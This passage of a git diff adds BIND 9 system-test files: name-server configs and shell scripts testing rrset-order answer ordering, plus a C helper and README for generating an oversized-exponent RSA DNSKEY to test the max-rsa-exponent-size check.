SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; + rrset-order { + class IN type A name "host.example.com" order random; + }; + +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/rrsetorder/ns5/named.conf.in b/bin/tests/system/rrsetorder/ns5/named.conf.in new file mode 100644 index 0000000..d1a4cfa --- /dev/null +++ b/bin/tests/system/rrsetorder/ns5/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/rrsetorder/setup.sh b/bin/tests/system/rrsetorder/setup.sh new file mode 100644 index 0000000..4b4a4c8 --- /dev/null +++ b/bin/tests/system/rrsetorder/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf diff --git a/bin/tests/system/rrsetorder/tests.sh b/bin/tests/system/rrsetorder/tests.sh new file mode 100644 index 0000000..0f5ce8a --- /dev/null +++ b/bin/tests/system/rrsetorder/tests.sh @@ -0,0 +1,553 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+nosea +nocomm +nocmd +noquest +noadd +noauth +nocomm +nostat +short +nocookie" +DIGCMD="$DIG $DIGOPTS -p ${PORT}" + +status=0 + +GOOD_RANDOM="1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24" +GOOD_RANDOM_NO=24 + +if grep "^#define DNS_RDATASET_FIXED" $TOP/config.h > /dev/null 2>&1 ; then + test_fixed=true +else + echo_i "Order 'fixed' disabled at compile time" + test_fixed=false +fi + +# +# +# +if $test_fixed; then + echo_i "Checking order fixed (primary)" + ret=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 + do + $DIGCMD @10.53.0.1 fixed.example > dig.out.fixed || ret=1 + $DIFF dig.out.fixed dig.out.fixed.good >/dev/null || ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +else + echo_i "Checking order fixed behaves as cyclic when disabled (primary)" + ret=0 + matches=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 + do + j=$((i % 4)) + $DIGCMD @10.53.0.1 fixed.example > dig.out.fixed || ret=1 + if [ $i -le 4 ]; then + cp dig.out.fixed dig.out.$j + else + $DIFF dig.out.fixed dig.out.$j >/dev/null && matches=$((matches + 1)) + fi + done + $DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 + $DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 + $DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 + $DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 + $DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 + $DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 + if [ $matches -ne 16 ]; then ret=1; fi + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +# +# +# +echo_i "Checking order cyclic (primary + additional)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.1 cyclic.example > dig.out.cyclic || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic dig.out.$j + else + $DIFF dig.out.cyclic dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +echo_i "Checking order cyclic (primary)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.1 cyclic2.example > dig.out.cyclic2 || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic2 dig.out.$j + else + $DIFF dig.out.cyclic2 dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) +echo_i "Checking order random (primary)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.1 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Random selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order none (primary)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.1 none.example > dig.out.none || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.none || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.1 none.example > dig.out.test$i || ret=1 + $DIFF dig.out.none dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +if $test_fixed; then + echo_i "Checking order fixed (secondary)" + ret=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 + do + $DIGCMD @10.53.0.2 fixed.example > dig.out.fixed || ret=1 + $DIFF dig.out.fixed dig.out.fixed.good || ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +# +# +# +echo_i "Checking order cyclic (secondary + additional)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.2 cyclic.example > dig.out.cyclic || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic dig.out.$j + else + $DIFF dig.out.cyclic dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +echo_i "Checking order cyclic (secondary)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.2 cyclic2.example > dig.out.cyclic2 || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic2 dig.out.$j + else + $DIFF dig.out.cyclic2 dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order random (secondary)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.2 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Random selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order none (secondary)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.2 none.example > dig.out.none || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.none || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.2 none.example > dig.out.test$i || ret=1 + $DIFF dig.out.none dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Shutting down secondary" + +stop_server ns2 + +echo_i "Checking for secondary's on disk copy of zone" + +if [ ! -f ns2/root.bk ] +then + echo_i "failed"; + status=$((status + 1)) +fi + +echo_i "Re-starting secondary" + +start_server --noclean --restart --port ${PORT} ns2 + +# +# +# +if $test_fixed; then + echo_i "Checking order fixed (secondary loaded from disk)" + ret=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 + do + $DIGCMD @10.53.0.2 fixed.example > dig.out.fixed || ret=1 + $DIFF dig.out.fixed dig.out.fixed.good || ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +# +# +# +echo_i "Checking order cyclic (secondary + additional, loaded from disk)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.2 cyclic.example > dig.out.cyclic || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic dig.out.$j + else + $DIFF dig.out.cyclic dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +echo_i "Checking order cyclic (secondary loaded from disk)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.2 cyclic2.example > dig.out.cyclic2 || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic2 dig.out.$j + else + $DIFF dig.out.cyclic2 dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order random (secondary loaded from disk)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.2 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Random selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order none (secondary loaded from disk)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.2 none.example > dig.out.none || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.none || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.2 none.example > dig.out.test$i || ret=1 + $DIFF dig.out.none dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +if $test_fixed; then + echo_i "Checking order fixed (cache)" + ret=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 + do + $DIGCMD @10.53.0.3 fixed.example > dig.out.fixed || ret=1 + $DIFF dig.out.fixed dig.out.fixed.good || ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +# +# +# +echo_i "Checking order cyclic (cache + additional)" +ret=0 +# prime acache +$DIGCMD @10.53.0.3 cyclic.example > dig.out.cyclic || ret=1 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.3 cyclic.example > dig.out.cyclic || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic dig.out.$j + else + $DIFF dig.out.cyclic dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +echo_i "Checking order cyclic (cache)" +ret=0 +# prime acache +$DIGCMD @10.53.0.3 cyclic2.example > dig.out.cyclic2 || ret=1 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.3 cyclic2.example > dig.out.cyclic2 || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic2 dig.out.$j + else + $DIFF dig.out.cyclic2 dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order random (cache)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.3 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Random selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order none (cache)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.3 none.example > dig.out.none || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.none || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.3 none.example > dig.out.test$i || ret=1 + $DIFF dig.out.none dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking default order (cache)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.5 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Default selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking default order no match in rrset-order (cache)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.4 nomatch.example > dig.out.nomatch || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.nomatch || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.4 nomatch.example > dig.out.test$i || ret=1 + $DIFF dig.out.nomatch dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rsabigexponent/Makefile.in b/bin/tests/system/rsabigexponent/Makefile.in new file mode 100644 index 0000000..550263c --- /dev/null +++ b/bin/tests/system/rsabigexponent/Makefile.in @@ -0,0 +1,51 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \ + ${OPENSSL_CFLAGS} + +CDEFINES = +CWARNINGS = + +DNSLIBS = ../../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@ +ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@ + +DNSDEPLIBS = ../../../../lib/dns/libdns.@A@ +ISCDEPLIBS = ../../../../lib/isc/libisc.@A@ + +DEPLIBS = ${DNSDEPLIBS} ${ISCDEPLIBS} + +LIBS = ${DNSLIBS} ${ISCLIBS} ${OPENSSL_LIBS} @LIBS@ + +TARGETS = bigkey@EXEEXT@ + +OBJS = bigkey.@O@ + +SRCS = bigkey.c + +@BIND9_MAKE_RULES@ + +all: bigkey@EXEEXT@ + +bigkey@EXEEXT@: ${OBJS} ${DEPLIBS} + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${OBJS} ${LIBS} + +clean distclean:: + rm -f ${TARGETS} + diff --git a/bin/tests/system/rsabigexponent/README.md b/bin/tests/system/rsabigexponent/README.md new file mode 100644 index 0000000..44afdbd --- /dev/null +++ b/bin/tests/system/rsabigexponent/README.md @@ -0,0 +1,39 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +The `rsabigexponent` test is used to `check max-rsa-exponent-size`. + +We only run this test on builds without PKCS#11, as we have control over +the RSA exponent size with plain OpenSSL. We have not explored how to do +this with PKCS#11, which would require generating such a key and then +signing a zone with it. Additionally, even with control of the exponent +size with PKCS#11, generating a DNSKEY with this property and signing +such a zone would be slow and undesirable for each test run; instead, we +use a pregenerated DNSKEY and a saved signed zone. These are located in +`rsabigexponent/ns2` and currently use RSASHA1 for the `DNSKEY` +algorithm; however, that may need to be changed in the future. + +To generate the `DNSKEY` used in this test, we used `bigkey.c`, as +dnssec-keygen is not capable of generating such keys. + +Do **not** remove `bigkey.c` as it may be needed to generate a new +`DNSKEY` for testing purposes. + +`bigkey` is used to both test that we are not running under PKCS#11 and +generate a `DNSKEY` key with a large RSA exponent. + +To regenerate `ns2/example.db.bad` comment out the range test in +opensslrsa_parse before signing the zone with a ZSK key generated +by `bigkey`. + + if (BN_num_bits(e) > RSA_MAX_PUBEXP_BITS) { + DST_RET(ISC_R_RANGE); + } diff --git a/bin/tests/system/rsabigexponent/bigkey.c b/bin/tests/system/rsabigexponent/bigkey.c new file mode 100644 index 0000000..ea57b34 --- /dev/null +++ b/bin/tests/system/rsabigexponent/bigkey.c @@ -0,0 +1,162 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <stdio.h> +#include <stdlib.h> + +#include <isc/buffer.h> +#include <isc/mem.h> +#include <isc/platform.h> +#include <isc/print.h> +#include <isc/region.h> +#include <isc/stdio.h> +#include <isc/string.h> +#include <isc/util.h> + +#define DST_KEY_INTERNAL + +#include <openssl/bn.h> +#include <openssl/err.h> +#include <openssl/evp.h> +#include <openssl/objects.h> +#include <openssl/rsa.h> + +#include <dns/dnssec.h> +#include <dns/fixedname.h> +#include <dns/keyvalues.h> +#include <dns/log.h> +#include <dns/name.h> +#include <dns/rdataclass.h> +#include <dns/result.h> +#include <dns/secalg.h> + +#include <dst/dst.h> +#include <dst/result.h> + +dst_key_t *key; +dns_fixedname_t fname; +dns_name_t *name; +unsigned int bits = 2048U; +isc_mem_t *mctx; +isc_log_t *log_; +isc_logconfig_t *logconfig; +int level = ISC_LOG_WARNING; +isc_logdestination_t destination; +char filename[255]; +isc_result_t result; +isc_buffer_t buf; +RSA *rsa; +BIGNUM *e; +EVP_PKEY *pkey; + +#define CHECK(op, msg) \ + do { \ + result = (op); \ + if (result != ISC_R_SUCCESS) { \ + fprintf(stderr, \ + "fatal error: %s returns %s at file %s line " \ + "%d\n", \ + msg, isc_result_totext(result), __FILE__, \ + __LINE__); \ + exit(1); \ + } \ + } while (0) + +int +main(int argc, char **argv) { + UNUSED(argc); + UNUSED(argv); + +#if !USE_PKCS11 + + rsa = RSA_new(); + e = BN_new(); + pkey = EVP_PKEY_new(); + + if ((rsa == NULL) || (e == NULL) || (pkey == NULL) || + !EVP_PKEY_set1_RSA(pkey, rsa)) + { + fprintf(stderr, "fatal error: basic OpenSSL failure\n"); + exit(1); + } + + /* e = 0x1000000000001 */ + BN_set_bit(e, 0); + BN_set_bit(e, 48); + + if (RSA_generate_key_ex(rsa, bits, e, NULL)) { + BN_free(e); + RSA_free(rsa); + } else { + fprintf(stderr, + "fatal error: RSA_generate_key_ex() fails " + "at file %s line %d\n", + __FILE__, __LINE__); + exit(1); + } + + dns_result_register(); + + isc_mem_create(&mctx); + CHECK(dst_lib_init(mctx, NULL), "dst_lib_init()"); + isc_log_create(mctx, &log_, &logconfig); + isc_log_setcontext(log_); + dns_log_init(log_); + dns_log_setcontext(log_); + isc_log_settag(logconfig, "bigkey"); + + destination.file.stream = stderr; + destination.file.name = NULL; + destination.file.versions = ISC_LOG_ROLLNEVER; + destination.file.maximum_size = 0; + isc_log_createchannel(logconfig, "stderr", ISC_LOG_TOFILEDESC, level, + &destination, + ISC_LOG_PRINTTAG | ISC_LOG_PRINTLEVEL); + + CHECK(isc_log_usechannel(logconfig, "stderr", NULL, NULL), "isc_log_" + "usechannel(" + ")"); + name = dns_fixedname_initname(&fname); + isc_buffer_constinit(&buf, "example.", strlen("example.")); + isc_buffer_add(&buf, strlen("example.")); + CHECK(dns_name_fromtext(name, &buf, dns_rootname, 0, NULL), "dns_name_" + "fromtext(" + "\"example." + "\")"); + + CHECK(dst_key_buildinternal(name, DNS_KEYALG_RSASHA256, bits, + DNS_KEYOWNER_ZONE, DNS_KEYPROTO_DNSSEC, + dns_rdataclass_in, pkey, mctx, &key), + "dst_key_buildinternal(...)"); + + CHECK(dst_key_tofile(key, DST_TYPE_PRIVATE | DST_TYPE_PUBLIC, NULL), + "dst_key_tofile()"); + isc_buffer_init(&buf, filename, sizeof(filename) - 1); + isc_buffer_clear(&buf); + CHECK(dst_key_buildfilename(key, 0, NULL, &buf), "dst_key_" + "buildfilename()"); + printf("%s\n", filename); + dst_key_free(&key); + + isc_log_destroy(&log_); + isc_log_setcontext(NULL); + dns_log_setcontext(NULL); + dst_lib_destroy(); + isc_mem_destroy(&mctx); + return (0); +#else /* !USE_PKCS11 */ + return (1); +#endif /* !USE_PKC11 */ +} + +/*! \file */ diff --git a/bin/tests/system/rsabigexponent/clean.sh b/bin/tests/system/rsabigexponent/clean.sh new file mode 100644 index 0000000..22ea41a --- /dev/null +++ b/bin/tests/system/rsabigexponent/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f K* */K* */dsset-*. */*.signed */trusted.conf */tmp* +rm -f ns*/dsset-example +rm -f ns*/named.run 